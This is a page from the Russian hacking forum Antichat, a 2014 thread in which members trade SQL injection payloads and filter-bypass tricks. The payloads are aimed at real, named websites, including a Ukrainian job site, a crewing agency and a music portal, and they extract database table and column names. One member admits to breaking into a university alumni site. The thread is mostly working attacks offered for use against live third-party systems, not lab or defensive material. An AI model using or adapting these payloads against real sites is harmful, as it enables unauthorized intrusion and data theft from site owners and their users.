HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23261  
Старый 05.02.2014, 18:26
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию

Цитата:
Сообщение от WallHack  
Фильтруется from
Такой запрос проходит -1%27+/*!union*/+SeLect+1/*!,*/version%28%29/*!,*/3/*!,*/4+--+
Такой не проходит -1%27+/*!union*/+SeLect+1/*!,*/password/*!,*/3/*!,*/4+/*!FrOm*/+--+
Как можно обойти фильтр ?
1. FRFROMOM

2. POST

2. From находится в связке с union, select, пробелом и т.д.
 
Ответить с цитированием

  #23262  
Старый 05.02.2014, 22:17
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от YaBtr  
Уязвимый параметр
year
:
5.1.70-log
Далее на пути стоит sweb, обходите путем изменения регистра.
Тьфу, ёпрст, я уж думал это вопрос Ну а раз нет ссылки погуглил, нашел и крутанул сайт

Код:
Красноярский государственный медицинский университет - Клуб выпускников
...бывает)))

П.С. Извиняюсь за офф.топ
 
Ответить с цитированием

  #23263  
Старый 06.02.2014, 00:26
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от GhostW  
Тьфу, ёпрст, я уж думал это вопрос
Ну а раз нет ссылки погуглил, нашел и крутанул сайт
Код:
Красноярский государственный медицинский университет - Клуб выпускников
...бывает)))
П.С. Извиняюсь за офф.топ
а я как раз думал, кто его похекал... но теперь и логи есть и IP и признание хацкера на форуме, пора подшивать дело!))) начальство и прокуратура будет довольна

Цитата:
Сообщение от GhostW  
П.С. Извиняюсь за офф.топ
да, не... молодец, все норм)))
 
Ответить с цитированием

  #23264  
Старый 06.02.2014, 02:48
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
а я как раз думал, кто его похекал... но теперь и логи есть и IP и признание хацкера на форуме, пора подшивать дело!))) начальство и прокуратура будет довольна
да, не... молодец, все норм)))
Админам на почту отписал так что не надо ля-ля...
 
Ответить с цитированием

  #23265  
Старый 06.02.2014, 18:01
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами: 6825206

Репутация: 24
По умолчанию

http://www.sailorjob.com.ua/show_firm/?id=482+order+by+1+--+
 
Ответить с цитированием

  #23266  
Старый 06.02.2014, 18:06
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от Unknowhacker  
http://www.sailorjob.com.ua/show_firm/?id=482+order+by+1+--+
Что с этим сделать надо?

Если раскрутить, то вот.

http://www.sailorjob.com.ua/show_firm/?id=482%27and(select+1+from(select+count(*),concat ((select+table_name+from+information_schema.tables +limit+0,1),floor(rand(0)*2))x+from+information_sc hema.tables+group+by+x)a)--+g
 
Ответить с цитированием

  #23267  
Старый 07.02.2014, 16:55
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Почему не выводит имя таблиц(ы)?

Код:
www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+
 
Ответить с цитированием

  #23268  
Старый 07.02.2014, 17:06
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от Shade  
Почему не выводит имя таблиц(ы)?
Код:
www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+
http://www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,(select(@x)from(select(@x:=0x00 ),(select(null)from(information_schema.columns)whe re(table_schema!=0x696e666f726d6174696f6e5f7363686 56d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_s chema,0x2e,table_name,0x3a,column_name))))x),3,4,5 ,6,7,8,9,10,11+--+
 
Ответить с цитированием

  #23269  
Старый 07.02.2014, 17:11
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию

Цитата:
Сообщение от Shade  
Почему не выводит имя таблиц(ы)?
Код:
www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+
unhex(hex(table_name))
 
Ответить с цитированием

  #23270  
Старый 07.02.2014, 19:38
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами: 6825206

Репутация: 24
По умолчанию

Код:
http://www.muzgid.ua/ru/news/info-42.html
- уязвимое поле поиска.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.